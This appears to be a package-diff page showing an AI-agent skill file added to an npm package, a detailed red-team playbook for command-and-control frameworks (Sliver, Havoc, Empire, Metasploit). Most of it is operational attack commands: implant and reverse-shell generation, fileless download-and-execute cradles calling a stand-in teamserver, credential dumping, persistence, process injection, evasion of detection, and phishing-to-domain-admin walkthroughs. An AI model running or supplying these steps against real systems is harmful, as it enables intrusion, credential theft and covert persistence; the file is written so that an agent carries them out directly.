npm - rtexit-method - Versions diffs - 0.1.0 → 0.1.2 - Mend

rtexit-method 0.1.0 → 0.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (224) hide show

package/packaged-assets/.agents/skills/rt-c2-operations/SKILL.md ADDED Viewed

@@ -0,0 +1,1072 @@
+---
+name: rt-c2-operations
+description: "Command and Control (C2) framework operations skill. Sliver C2 (open source): server setup, implant generation for HTTP/HTTPS/DNS/mTLS, beacon commands. Havoc C2: teamserver setup, agent generation. Empire PowerShell: installation and basic operation. Metasploit meterpreter: handler setup, session management. Common C2 commands across frameworks. OPSEC considerations for C2 traffic."
+---
+# rt-c2-operations — Command and Control Framework Operations
+## Overview
+This skill covers the deployment, configuration, and operational use of Command and Control (C2) frameworks during authorized red team engagements. C2 infrastructure is the backbone of persistent access and post-exploitation operations, enabling operators to issue commands, exfiltrate data, and maintain footholds across target environments.
+C2 operations require careful planning, infrastructure preparation, and ongoing OPSEC discipline. Sloppy C2 usage is the single most common cause of red team detection and early termination of engagements.
+**Use this skill when:**
+- Establishing persistent access after initial compromise
+- Coordinating multi-operator engagements requiring shared session management
+- Moving laterally across segmented networks
+- Simulating APT tradecraft for detection validation
+- Conducting long-duration engagements requiring beacon resilience
+**Frameworks covered:**
+- Sliver C2 (primary, open source, actively maintained)
+- Havoc C2 (advanced, demon agent)
+- Empire PowerShell C2 (Windows-heavy environments)
+- Metasploit Meterpreter (rapid exploitation, familiar baseline)
+---
+## Prerequisites and Tool Setup
+### System Requirements
+- Kali Linux 2023.x or later (operator workstation)
+- VPS or dedicated server for C2 teamserver (Ubuntu 22.04 LTS recommended)
+- Domain name with DNS control (for redirectors and DNS C2)
+- Valid TLS certificates (Let's Encrypt or purchased)
+- Minimum 2 GB RAM on teamserver, 4 GB recommended for Havoc
+### Infrastructure Layout
+```
+[Operator Workstation] --> [Teamserver VPS] <-- [Redirector] <-- [Target Implant]
+```
+Never expose the teamserver IP directly. Always use redirectors (Apache/Nginx mod_rewrite, Cloudflare, or dedicated redirector servers).
+---
+### Sliver C2 Setup
+**GitHub:** https://github.com/BishopFox/sliver
+```bash
+# Install on teamserver (Ubuntu 22.04)
+curl https://sliver.sh/install | sudo bash
+# Start server as a service
+sudo systemctl enable sliver
+sudo systemctl start sliver
+# Connect as operator
+sliver-server
+# On operator workstation - install client
+wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-client_linux
+chmod +x sliver-client_linux
+sudo mv sliver-client_linux /usr/local/bin/sliver
+# Generate operator config (run on teamserver)
+sliver-server operator --name operator1 --lhost TEAMSERVER_IP --save /tmp/operator1.cfg
+# Connect client to server
+sliver import /tmp/operator1.cfg
+sliver
+```
+### Havoc C2 Setup
+**GitHub:** https://github.com/HavocFramework/Havoc
+```bash
+# Dependencies
+sudo apt update && sudo apt install -y git build-essential cmake mingw-w64 \
+  nasm python3 python3-pip libssl-dev libz-dev golang-go
+# Clone and build
+git clone https://github.com/HavocFramework/Havoc.git
+cd Havoc
+# Build teamserver
+cd teamserver
+go mod download
+go build -o teamserver .
+# Build client
+cd ../client
+python3 -m pip install -r requirements.txt
+python3 Havoc.py
+# Create profile (profiles/example.yaotl is a good start)
+cp profiles/example.yaotl profiles/engagement.yaotl
+# Edit engagement.yaotl with your teamserver IP, port, and credentials
+```
+### Empire PowerShell C2 Setup
+**GitHub:** https://github.com/BC-SECURITY/Empire
+```bash
+# Clone and install
+git clone https://github.com/BC-SECURITY/Empire.git
+cd Empire
+sudo ./setup/install.sh
+# Start server
+sudo ./empire --server
+# Start client (separate terminal)
+./empire --client
+# Or use the RESTful API
+sudo ./empire --server --rest --username admin --password changeme
+```
+### Metasploit Setup (Kali — pre-installed)
+```bash
+# Start PostgreSQL for session persistence
+sudo systemctl start postgresql
+# Initialize database
+sudo msfdb init
+# Launch Metasploit
+msfconsole
+# Verify database connection
+msf6 > db_status
+```
+---
+## Skill Levels
+### BEGINNER — Metasploit Meterpreter Basics
+**Goal:** Understand C2 fundamentals with the most documented framework.
+#### 1. Set Up a Basic Listener
+```bash
+msfconsole
+# Generic TCP reverse shell handler
+msf6 > use exploit/multi/handler
+msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/handler) > set LHOST YOUR_IP
+msf6 exploit(multi/handler) > set LPORT 4444
+msf6 exploit(multi/handler) > set ExitOnSession false
+msf6 exploit(multi/handler) > run -j
+```
+#### 2. Generate a Basic Implant
+```bash
+# Generate a Windows EXE payload
+msfvenom -p windows/x64/meterpreter/reverse_tcp \
+  LHOST=YOUR_IP LPORT=4444 \
+  -f exe -o implant.exe
+# Generate a PowerShell one-liner
+msfvenom -p windows/x64/meterpreter/reverse_tcp \
+  LHOST=YOUR_IP LPORT=4444 \
+  -f psh -o implant.ps1
+```
+#### 3. Basic Meterpreter Session Commands
+```bash
+# List active sessions
+msf6 > sessions -l
+# Interact with a session
+msf6 > sessions -i 1
+# Core commands
+meterpreter > sysinfo           # System information
+meterpreter > getuid            # Current user
+meterpreter > getpid            # Current process ID
+meterpreter > ps                # List processes
+meterpreter > pwd               # Print working directory
+meterpreter > ls                # List directory contents
+meterpreter > download /etc/passwd /tmp/
+meterpreter > upload /tmp/tool.exe C:\\Users\\Public\\tool.exe
+meterpreter > shell             # Drop to OS shell
+meterpreter > background        # Return to msf console
+meterpreter > exit              # Kill session
+```
+#### 4. Persistence (Basic)
+```bash
+# Registry persistence
+meterpreter > run persistence -X -i 30 -p 4444 -r YOUR_IP
+# Scheduled task persistence
+meterpreter > run post/windows/manage/persistence_exe \
+  STARTUP=SCHEDULER \
+  SESSION=1
+```
+---
+### INTERMEDIATE — Sliver C2 Operations
+**Goal:** Operate Sliver for realistic engagements with multiple transport options.
+#### 1. Start Listeners
+```bash
+# HTTP listener
+sliver > http --lhost 0.0.0.0 --lport 80
+# HTTPS listener (requires cert)
+sliver > https --lhost 0.0.0.0 --lport 443 \
+  --cert /etc/ssl/certs/fullchain.pem \
+  --key /etc/ssl/private/privkey.pem
+# DNS listener (requires domain delegation)
+sliver > dns --domains c2.yourdomain.com
+# mTLS listener (highest security)
+sliver > mtls --lhost 0.0.0.0 --lport 8888
+```
+#### 2. Generate Implants
+```bash
+# HTTP implant (session mode — interactive)
+sliver > generate --http TEAMSERVER_IP --os windows --arch amd64 \
+  --format exe --save /tmp/implant_http.exe
+# HTTPS implant with domain fronting
+sliver > generate --http https://c2.yourdomain.com --os windows \
+  --arch amd64 --format exe --save /tmp/implant_https.exe
+# DNS beacon (stealthy, slow)
+sliver > generate beacon --dns c2.yourdomain.com --os windows \
+  --arch amd64 --format exe --save /tmp/beacon_dns.exe
+# Shellcode output (for injection)
+sliver > generate --http TEAMSERVER_IP --os windows --arch amd64 \
+  --format shellcode --save /tmp/implant.bin
+# Linux implant
+sliver > generate --mtls TEAMSERVER_IP:8888 --os linux --arch amd64 \
+  --format elf --save /tmp/implant_linux
+# macOS implant
+sliver > generate --http TEAMSERVER_IP --os darwin --arch amd64 \
+  --format macho --save /tmp/implant_macos
+```
+#### 3. Beacon vs Session Mode
+```bash
+# Beacon: checks in at intervals (stealthy, like APT)
+sliver > generate beacon --http TEAMSERVER_IP \
+  --seconds 60 --jitter 30 \
+  --os windows --arch amd64 --format exe
+# Session: persistent interactive connection (noisier)
+sliver > generate --http TEAMSERVER_IP \
+  --os windows --arch amd64 --format exe
+# List beacons (waiting for check-in)
+sliver > beacons
+# Interact with beacon (tasks are queued, executed on next check-in)
+sliver > use BEACON_ID
+# List active sessions (interactive)
+sliver > sessions
+sliver > use SESSION_ID
+```
+#### 4. Core Sliver Session Commands
+```bash
+# System recon
+sliver (IMPLANT) > info          # Session metadata
+sliver (IMPLANT) > whoami        # Current user
+sliver (IMPLANT) > pwd           # Working directory
+sliver (IMPLANT) > ls            # List files
+sliver (IMPLANT) > ps            # Process list
+sliver (IMPLANT) > netstat       # Network connections
+sliver (IMPLANT) > ifconfig      # Network interfaces
+sliver (IMPLANT) > env           # Environment variables
+# File operations
+sliver (IMPLANT) > download /etc/shadow
+sliver (IMPLANT) > upload /tmp/linpeas.sh /tmp/linpeas.sh
+sliver (IMPLANT) > rm /tmp/implant.exe
+sliver (IMPLANT) > mkdir C:\\ProgramData\\updates
+# Execution
+sliver (IMPLANT) > execute -o whoami
+sliver (IMPLANT) > shell         # Interactive shell (OPSEC risk)
+# Lateral movement
+sliver (IMPLANT) > socks5 start --host 127.0.0.1 --port 1080
+# Then use proxychains with other tools
+# Port forwarding
+sliver (IMPLANT) > portfwd add --remote 192.168.1.10:3389 --local 127.0.0.1:33890
+# Process injection
+sliver (IMPLANT) > migrate --pid TARGET_PID
+# Screenshot
+sliver (IMPLANT) > screenshot
+# Pivot (route through compromised host to reach internal network)
+sliver (IMPLANT) > pivots tcp --bind 0.0.0.0:9999
+```
+#### 5. Armory Extensions (Sliver Modules)
+```bash
+# Install armory packages
+sliver > armory install all
+# Run BOFs (Beacon Object Files)
+sliver (IMPLANT) > bof <module_name> [args]
+# Common BOF modules
+sliver (IMPLANT) > sharp-hound-4    # BloodHound data collection
+sliver (IMPLANT) > sa-whoami        # Detailed user/token info
+sliver (IMPLANT) > arp-scan         # ARP scanning via BOF
+```
+---
+### ADVANCED — Havoc C2 and Evasion Techniques
+**Goal:** Use Havoc's Demon agent for advanced evasion and in-memory operations.
+#### 1. Configure Havoc Teamserver Profile
+```yaml
+# profiles/engagement.yaotl
+Teamserver {
+    Host = "0.0.0.0"
+    Port = 40056
+    Build {
+        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
+        Nasm = "/usr/bin/nasm"
+    }
+}
+Operators {
+    operator "redteam1" {
+        Password = "StrongPassword123!"
+    }
+}
+Listeners {
+    Http {
+        Name         = "http-listener"
+        Hosts        = ["TEAMSERVER_IP"]
+        HostBind     = "0.0.0.0"
+        PortBind     = 80
+        PortConn     = 80
+        HostRotation = "round-robin"
+        Secure       = false
+        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
+        Headers {
+            "Content-type"  = "text/plain"
+            "Cache-Control" = "no-cache"
+        }
+        Uris = [
+            "/wordpress/wp-content/plugins/",
+            "/static/js/analytics.js",
+            "/api/v2/telemetry"
+        ]
+        Response {
+            Headers {
+                "Content-type"  = "text/html; charset=utf-8"
+                "Server"        = "Apache/2.4.41"
+            }
+        }
+    }
+}
+```
+```bash
+# Start teamserver with profile
+./teamserver server --profile profiles/engagement.yaotl
+# Connect client
+python3 Havoc.py --profile profiles/engagement.yaotl
+```
+#### 2. Generate Demon Agent (Havoc)
+Via the Havoc GUI:
+1. Navigate to Attack > Payload
+2. Select listener
+3. Configure sleep (300s recommended), jitter (30%)
+4. Enable indirect syscalls, stack spoofing
+5. Set injection method to "NtCreateThreadEx"
+6. Generate and download
+#### 3. Demon Agent Commands
+```bash
+# In Havoc console (interact with agent)
+# Basic recon
+whoami /all
+shell ipconfig /all
+shell net user /domain
+shell net group "Domain Admins" /domain
+# Process operations
+ps                              # List processes
+inject <PID> <shellcode_path>  # Inject shellcode into process
+token steal <PID>              # Steal token from process
+token make <user> <pass> <domain>  # Create token
+# Inline .NET execution (no disk touch)
+dotnet inline-execute /tmp/Rubeus.exe asktgt /user:TARGET /password:PASS
+# BOF execution
+bof /tmp/whoami.o
+# SOCKS5 pivot
+socks 1080
+```
+#### 4. Process Injection Techniques
+```bash
+# Sliver — injection into existing process
+sliver (IMPLANT) > ps | grep -i explorer
+sliver (IMPLANT) > migrate --pid 1234
+# Metasploit — process migration
+meterpreter > migrate 1234
+meterpreter > migrate -N explorer.exe
+# Havoc — inject shellcode
+# Generate raw shellcode from Sliver/Metasploit, inject via Havoc
+inject 1234 /tmp/beacon.bin
+```
+#### 5. Living-off-the-Land C2 Delivery
+```powershell
+# PowerShell download cradle (Empire/Metasploit staging)
+powershell -nop -w hidden -enc BASE64_ENCODED_COMMAND
+# WMI-based execution (for lateral movement)
+wmic /node:TARGET_IP process call create "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://TEAMSERVER/stage')"
+# MSHTA delivery
+mshta http://TEAMSERVER/payload.hta
+# Certutil (download)
+certutil -urlcache -split -f http://TEAMSERVER/implant.exe C:\Windows\Temp\svc.exe
+```
+---
+### EXPERT — Infrastructure, Redirectors, and Domain Fronting
+**Goal:** Build resilient, detection-resistant C2 infrastructure.
+#### 1. Apache Redirector with mod_rewrite
+```bash
+# Install Apache on redirector VPS
+sudo apt install apache2
+sudo a2enmod rewrite proxy proxy_http ssl
+# /etc/apache2/sites-available/redirector.conf
+```
+```apache
+<VirtualHost *:443>
+    ServerName c2.yourdomain.com
+    SSLEngine on
+    SSLCertificateFile /etc/ssl/certs/fullchain.pem
+    SSLCertificateKeyFile /etc/ssl/private/privkey.pem
+    RewriteEngine On
+    # Only pass Sliver/Havoc URIs to teamserver
+    RewriteCond %{REQUEST_URI} ^/(wordpress/wp-content|static/js|api/v2) [NC]
+    RewriteRule ^(.*)$ http://TEAMSERVER_IP:80$1 [P,L]
+    # Block everything else (return 404 or redirect to legitimate site)
+    RewriteRule ^(.*)$ https://www.google.com/ [R=302,L]
+</VirtualHost>
+```
+```bash
+sudo a2ensite redirector.conf
+sudo systemctl reload apache2
+```
+#### 2. Nginx Redirector
+```nginx
+# /etc/nginx/sites-available/c2-redirector
+server {
+    listen 443 ssl;
+    server_name c2.yourdomain.com;
+    ssl_certificate /etc/ssl/certs/fullchain.pem;
+    ssl_certificate_key /etc/ssl/private/privkey.pem;
+    # Forward C2 traffic
+    location ~ ^/(api|static|wp-content) {
+        proxy_pass http://TEAMSERVER_IP:80;
+        proxy_set_header Host $host;
+        proxy_set_header X-Real-IP $remote_addr;
+    }
+    # Decoy response for scanners
+    location / {
+        return 302 https://microsoft.com;
+    }
+}
+```
+#### 3. DNS C2 with Sliver
+```bash
+# Delegate DNS subdomain to teamserver
+# In your domain registrar, add NS records:
+# c2ns.yourdomain.com -> NS -> TEAMSERVER_IP
+# Start DNS listener on teamserver
+sliver > dns --domains c2.yourdomain.com --lhost TEAMSERVER_IP
+# Generate DNS beacon
+sliver > generate beacon --dns c2.yourdomain.com \
+  --seconds 120 --jitter 60 \
+  --os windows --arch amd64 --format exe
+# DNS C2 is extremely slow but nearly impossible to block without breaking DNS
+# Use only for fallback or exfil in locked-down environments
+```
+#### 4. Domain Fronting (CDN-based)
+```bash
+# Concept: Route C2 traffic through CDN (Cloudflare, Azure CDN, CloudFront)
+# CDN sees traffic as going to a legitimate domain; real destination is your teamserver
+# Cloudflare setup:
+# 1. Add your domain to Cloudflare
+# 2. Set A record for c2.yourdomain.com -> TEAMSERVER_IP (proxied = orange cloud ON)
+# 3. Sliver listener uses HTTPS with your domain
+# 4. All traffic appears to come from Cloudflare IPs
+sliver > https --lhost 0.0.0.0 --lport 443 \
+  --cert /etc/ssl/certs/fullchain.pem \
+  --key /etc/ssl/private/privkey.pem
+sliver > generate --http https://c2.yourdomain.com \
+  --os windows --arch amd64 --format exe
+```
+#### 5. Multi-Hop C2 with SOCKS Pivoting
+```bash
+# Establish first hop
+sliver (IMPLANT_DMZ) > socks5 start --host 127.0.0.1 --port 1080
+# Configure proxychains
+# /etc/proxychains4.conf
+# socks5 127.0.0.1 1080
+# Use proxychains to reach internal network
+proxychains nmap -sT -Pn 10.10.10.0/24 -p 22,80,443,3389,445
+# Generate implant for internal network (routed through first hop)
+proxychains sliver > generate --mtls 10.10.10.20:8888 \
+  --os windows --arch amd64 --format exe
+# Stage internal implant via first hop
+proxychains python3 -m http.server 8080
+```
+#### 6. C2 Profile Customization (Malleable C2)
+```bash
+# Sliver HTTP C2 profile customization
+# Edit ~/.sliver/configs/http-c2.json
+{
+  "implant_config": {
+    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
+    "chrome_base_version": 100,
+    "macos_version": "10_15_7",
+    "url_parameters": {
+      "session": "ABCxyz123",
+      "utm_source": "google"
+    },
+    "headers": [
+      {"name": "Accept", "value": "text/html,application/xhtml+xml"},
+      {"name": "Accept-Language", "value": "en-US,en;q=0.9"},
+      {"name": "Cache-Control", "value": "max-age=0"}
+    ],
+    "paths": ["/wp-content/plugins/", "/static/js/", "/api/v2/data/"]
+  }
+}
+```
+---
+## Step-by-Step Attack Workflow
+### Phase 1: Infrastructure Preparation
+```
+1. Acquire VPS for teamserver (pay with cryptocurrency if applicable)
+2. Register domain > 30 days old (or purchase aged domain)
+3. Configure DNS: A records for c2.domain.com pointing to redirector
+4. Obtain TLS certificate: sudo certbot certonly --standalone -d c2.domain.com
+5. Install and configure redirector (Apache/Nginx with mod_rewrite)
+6. Install Sliver (or chosen framework) on teamserver
+7. Configure firewall: only allow redirector IP to reach teamserver ports
+8. Test connectivity: curl -k https://c2.domain.com/test-uri
+```
+### Phase 2: Implant Generation
+```
+9.  Choose transport based on target environment:
+    - HTTPS: most environments allow outbound 443
+    - DNS: for heavily filtered environments
+    - mTLS: for internal red team infrastructure
+10. Configure sleep/jitter appropriate to engagement duration:
+    - Active ops: 30s / 20% jitter
+    - Long-haul persistent: 300s / 40% jitter
+11. Generate implant with appropriate format:
+    - exe: direct execution
+    - shellcode: for injection via dropper
+    - dll: for DLL sideloading
+12. Test implant in isolated lab before deploying to target
+13. Check implant against AV (VirusTotal ONLY after engagement, use antiscan.me during)
+```
+### Phase 3: Initial Access and Callback
+```
+14. Deliver implant via agreed initial access method:
+    - Phishing email with macro document
+    - Exploiting vulnerability (separate skill)
+    - Physical access / USB drop
+15. Confirm callback in Sliver: sessions -l
+16. Verify implant integrity: whoami, sysinfo
+17. Migrate to stable process if needed (avoid short-lived processes)
+18. Document: session ID, hostname, username, timestamp
+```
+### Phase 4: Post-Exploitation via C2
+```
+19. Situational awareness:
+    sliver > ifconfig, netstat, ps, env
+20. Privilege escalation (if needed):
+    sliver > execute -o whoami /priv
+    Use dedicated priv-esc skill
+21. Credential harvesting (requires elevated privileges):
+    sliver > armory install sharp-dpapi
+    sliver > sharp-dpapi machinemasterkeys
+22. Lateral movement:
+    sliver > socks5 start --port 1080
+    proxychains crackmapexec smb 10.10.10.0/24
+23. Establish secondary persistence:
+    - Register-scheduled-task via shell
+    - WMI subscription
+    - Registry Run key
+24. Pivot deeper: generate new implant for each network segment
+```
+### Phase 5: Objectives and Cleanup
+```
+25. Complete engagement objectives (data exfil, access proof screenshots)
+26. Document all implants deployed (for cleanup)
+27. Remove persistence mechanisms in reverse order
+28. Kill all active sessions
+29. Delete implant files from target systems
+30. Archive teamserver logs and session recordings
+```
+---
+## Real Attack Scenarios
+### Scenario 1: Corporate External Phishing to Domain Admin
+**Environment:** Windows Active Directory, Defender enabled, outbound HTTPS allowed
+```bash
+# Step 1: Generate HTTPS Sliver beacon with profile mimicking browser traffic
+sliver > generate beacon \
+  --http https://updates.microsoft-cdn.com \
+  --seconds 60 --jitter 30 \
+  --os windows --arch amd64 \
+  --format shellcode \
+  --save /tmp/stage2.bin
+# Step 2: Wrap shellcode in VBA macro dropper (use separate dropper skill)
+# Macro downloads stage2.bin and injects into explorer.exe
+# Step 3: Beacon checks in; operator interacts
+sliver > beacons
+sliver > use BEACON_ID
+# Step 4: Situational awareness
+sliver (CORP-PC01) > whoami
+sliver (CORP-PC01) > sysinfo
+sliver (CORP-PC01) > ps | grep -i defender
+# Step 5: Dump credentials (if admin)
+sliver (CORP-PC01) > armory install sharp-hound-4
+sliver (CORP-PC01) > sharp-hound-4 --CollectionMethods All --OutputDirectory /tmp
+# Download BloodHound output
+sliver (CORP-PC01) > download /tmp/20240101_BloodHound.zip
+# Step 6: Identify DA path via BloodHound, target kerberoastable accounts
+# Step 7: Pivot to DC
+sliver (CORP-PC01) > socks5 start --port 1080
+proxychains impacket-GetUserSPNs DOMAIN/user:password -dc-ip 10.10.10.10 -request
+# Step 8: Crack hash offline, use to get DA session
+proxychains impacket-psexec DOMAIN/DA_USER@DC_IP
+```
+---
+### Scenario 2: Assumed Breach — Internal Pivot via DNS C2
+**Environment:** Heavily monitored network, DNS only allowed outbound
+```bash
+# Step 1: Configure DNS C2 (DNS delegation pre-configured)
+sliver > dns --domains internal-telemetry.corp-updates.com
+# Step 2: Generate DNS beacon (slow but stealthy)
+sliver > generate beacon \
+  --dns internal-telemetry.corp-updates.com \
+  --seconds 300 --jitter 120 \
+  --os windows --arch amd64 \
+  --format exe \
+  --save /tmp/dns_beacon.exe
+# Step 3: Place beacon on target (via assumed breach access)
+# Copy to C:\Windows\System32\svchost_updater.exe
+# Step 4: Wait for check-in (DNS beacon is slow — plan accordingly)
+sliver > beacons
+# Step 5: Minimal footprint commands (each command = DNS query burst)
+sliver (TARGET) > whoami
+sliver (TARGET) > execute -o "net localgroup administrators"
+# Step 6: For large data transfer, switch to HTTPS via second implant
+# Generate HTTPS implant, upload via DNS session (slow), execute
+sliver (TARGET) > upload /tmp/https_beacon.exe C:\\Windows\\Temp\\wuauclt.exe
+sliver (TARGET) > execute -o "C:\\Windows\\Temp\\wuauclt.exe"
+```
+---
+### Scenario 3: Metasploit + Sliver Handoff (Rapid Exploitation to Persistent Access)
+**Environment:** Exploitable web server, need persistent access beyond Metasploit
+```bash
+# Step 1: Exploit via Metasploit
+msfconsole
+msf6 > use exploit/multi/handler
+msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+msf6 > set LHOST YOUR_IP
+msf6 > set LPORT 4444
+msf6 > run -j
+# (Trigger exploit — separate step)
+# Step 2: In Meterpreter session, download and run Sliver implant
+meterpreter > upload /tmp/sliver_linux /tmp/.update
+meterpreter > shell
+$ chmod +x /tmp/.update
+$ /tmp/.update &
+$ exit
+# Step 3: Switch to Sliver for persistent operations
+sliver > sessions   # Sliver session appears
+sliver > use SESSION_ID
+# Step 4: Kill Meterpreter session (clean up noisier connection)
+msf6 > sessions -k 1
+# Step 5: Establish persistence via cron
+sliver (WEB-SERVER) > execute -o "echo '*/15 * * * * /tmp/.update' | crontab -"
+# Step 6: Set up SOCKS proxy for internal network access
+sliver (WEB-SERVER) > socks5 start --port 1080
+proxychains nmap -sT -Pn 10.0.0.0/8 -p 22,80,443,3389,445 --open
+```
+---
+## Empire PowerShell C2 (Windows-Heavy Environments)
+```bash
+# Start Empire server
+sudo ./empire --server
+# Connect Empire client
+./empire --client
+# Create HTTP listener
+(Empire) > uselistener http
+(Empire: uselistener/http) > set Name http1
+(Empire: uselistener/http) > set Host http://TEAMSERVER_IP
+(Empire: uselistener/http) > set Port 80
+(Empire: uselistener/http) > execute
+# Generate stager
+(Empire) > usestager windows/launcher_bat
+(Empire: stager/windows/launcher_bat) > set Listener http1
+(Empire: stager/windows/launcher_bat) > execute
+# List agents
+(Empire) > agents
+# Interact with agent
+(Empire) > interact AGENT_NAME
+# Run modules
+(Empire: AGENT_NAME) > usemodule situational_awareness/host/winenum
+(Empire: AGENT_NAME) > usemodule credentials/mimikatz/logonpasswords
+(Empire: AGENT_NAME) > usemodule lateral_movement/invoke_wmi
+```
+---
+## OPSEC Considerations
+### Detection Risks
+| Risk | Framework | Detection Method | Mitigation |
+|------|-----------|-----------------|------------|
+| Default certificates | All | TLS fingerprinting (JA3/JA3S) | Use custom certs, modify TLS stack |
+| Default URIs | Sliver/Havoc | Proxy/IDS URI matching | Customize HTTP profiles |
+| Beacon regularity | All | Beaconing analysis via ML | High jitter (40%+), sleep skew |
+| Process hollowing | Metasploit | Memory scanning, ETW | Use BOFs, direct syscalls |
+| DNS query bursts | Sliver DNS | DNS analytics | Longer sleep intervals |
+| TeamServer exposure | All | Port scanning, cert lookup | Always use redirectors |
+| Known IOCs | Metasploit | AV/EDR signatures | Custom encoders, in-memory staging |
+| Lateral movement noise | All | SIEM correlation rules | Single-hop pivoting, credential reuse |
+### Detection Mitigation — Detailed
+```bash
+# 1. Randomize beacon sleep with jitter
+# Sliver beacon with 40% jitter
+sliver > generate beacon --seconds 300 --jitter 120 ...
+# 2. Avoid spawning cmd.exe / powershell.exe from unusual parents
+# Use execute -o instead of shell command in Sliver
+sliver (IMPLANT) > execute -o whoami    # Direct execution, no shell spawn
+# vs (AVOID)
+sliver (IMPLANT) > shell               # Spawns cmd.exe — loud
+# 3. Migrate into long-running, signed processes
+# Target: explorer.exe, svchost.exe, RuntimeBroker.exe
+sliver (IMPLANT) > migrate --pid <EXPLORER_PID>
+# 4. Clean up staged files
+sliver (IMPLANT) > rm C:\\Users\\Public\\implant.exe
+# 5. Use HTTPS to blend with legitimate web traffic
+# HTTP implants are trivially inspected by proxy
+# 6. Validate redirector is working (teamserver IP never touches target)
+curl -v https://c2.yourdomain.com/api/v2/test
+# Should respond (even with 404) from redirector, not teamserver
+# 7. Use in-memory execution where possible
+# Avoid writing implant to disk — use fileless staging
+powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://TEAMSERVER/stage')"
+```
+### Log Artifacts to be Aware Of
+```
+Windows:
+- Event ID 4688: Process creation (cmd.exe, powershell.exe children)
+- Event ID 4624/4625: Logon events (lateral movement)
+- Event ID 7045: New service installed (persistence)
+- Sysmon Event ID 3: Network connections from implant process
+- Sysmon Event ID 8: CreateRemoteThread (process injection)
+- PowerShell Script Block Logging (Event ID 4104)
+Linux:
+- /var/log/auth.log: SSH and sudo activity
+- /var/log/syslog: Cron job execution
+- auditd: System call auditing (execve, open)
+- bash history: Operator commands (clear with unset HISTFILE)
+Network:
+- Proxy logs: User-agent strings, URI patterns
+- DNS logs: Unusual query frequency, subdomain patterns
+- NetFlow: Beaconing to external IPs
+- IDS alerts: Sliver/Metasploit signatures (update to custom profiles)
+```
+---
+## Output and Documentation Instructions
+### Session Recording
+```bash
+# Sliver — all commands and output are logged automatically
+# Logs stored: ~/.sliver/logs/
+# Metasploit — spool output to file
+msf6 > spool /tmp/engagement_msf.log
+# Manual screenshot evidence
+sliver (IMPLANT) > screenshot
+# Saves to: ~/.sliver/screenshots/
+# Terminal session recording (entire operator terminal)
+script -a /tmp/rt_session_$(date +%Y%m%d_%H%M%S).log
+# Stop with: exit
+```
+### Evidence Collection Template
+```
+For each C2 session, document:
+DATE/TIME (UTC):
+OPERATOR:
+TARGET HOSTNAME:
+TARGET IP:
+TARGET OS:
+FRAMEWORK USED:
+SESSION/BEACON ID:
+IMPLANT HASH (SHA256):
+TRANSPORT:
+CALLBACK IP/DOMAIN:
+INITIAL ACCESS METHOD:
+PRIVILEGES OBTAINED:
+ACTIONS TAKEN: (list with timestamps)
+EVIDENCE FILES: (screenshots, downloads)
+PERSISTENCE MECHANISMS: (must be removed at end)
+```
+### Implant Tracking
+```bash
+# SHA256 hash all implants before deployment
+sha256sum implant.exe > /tmp/implant_hashes.txt
+# Track all deployed implants in engagement log
+echo "$(date -u) | implant.exe | TARGET_HOSTNAME | C:\\Windows\\Temp\\" >> /tmp/deployed_implants.txt
+# End-of-engagement cleanup checklist
+# - Remove all files listed in deployed_implants.txt
+# - Delete all scheduled tasks / cron jobs created
+# - Revert registry modifications
+# - Confirm no active sessions remain: sliver > sessions
+```
+---
+## Troubleshooting
+```bash
+# Implant not calling back
+# 1. Verify listener is running
+sliver > jobs
+# 2. Test connectivity from target network
+curl -k https://c2.yourdomain.com/api/v2/test
+# 3. Check firewall on teamserver
+sudo iptables -L -n | grep -E "80|443|8888"
+# 4. Check redirector logs
+sudo tail -f /var/log/apache2/access.log
+# 5. DNS not resolving
+nslookup c2.yourdomain.com TEAMSERVER_IP
+# Session keeps dying
+# 1. Migrate to stable process
+sliver (IMPLANT) > migrate --pid <SVCHOST_PID>
+# 2. Increase sleep (short sleep = more noise = faster detection/kill)
+# Regenerate beacon with longer interval
+# 3. Check if AV is killing implant
+# Use process injection rather than standalone exe
+# mTLS connection issues
+# Verify cert and key match
+openssl verify -CAfile ca.crt client.crt
+```
+---
+## Resources
+### Documentation
+- Sliver Wiki: https://github.com/BishopFox/sliver/wiki
+- Havoc Documentation: https://havocframework.com/docs
+- Empire Documentation: https://bc-security.gitbook.io/empire-wiki
+- Metasploit Documentation: https://docs.metasploit.com
+### GitHub Repositories
+- Sliver C2: https://github.com/BishopFox/sliver
+- Havoc C2: https://github.com/HavocFramework/Havoc
+- Empire C2: https://github.com/BC-SECURITY/Empire
+- Metasploit Framework: https://github.com/rapid7/metasploit-framework
+- C2 Matrix (framework comparison): https://github.com/cedowens/C2_Matrix
+### C2 Profile Resources
+- Sliver HTTP C2 config: https://github.com/BishopFox/sliver/blob/master/server/configs/http-c2.json
+- Malleable C2 profiles for Cobalt Strike (reference for profile design): https://github.com/rsmudge/Malleable-C2-Profiles
+- SourcePoint (Cobalt Strike profile generator, concepts apply): https://github.com/Tylous/SourcePoint
+### Detection and Evasion Research
+- JA3/JA3S TLS fingerprinting: https://github.com/salesforce/ja3
+- Sliver detection research: https://github.com/matterpreter/OffensiveCSharp
+- C2 OPSEC guide: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
+- Red Team Infrastructure Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
+### BOF (Beacon Object Files)
+- TrustedSec CS-Situational-Awareness-BOF: https://github.com/trustedsec/CS-Situational-Awareness-BOF
+- Sliver Armory: https://github.com/sliverarmory
+- Outflank BOFs: https://github.com/outflanknl/C2-Tool-Collection
+### Redirector Setup
+- Apache mod_rewrite for C2: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki/blob/master/Redirectors.md
+- Nginx C2 proxy configs: https://github.com/threatexpress/cs2modrewrite
+---
+*All techniques documented here are for authorized red team engagements only. Ensure written authorization is obtained before deploying C2 infrastructure against any target environment.*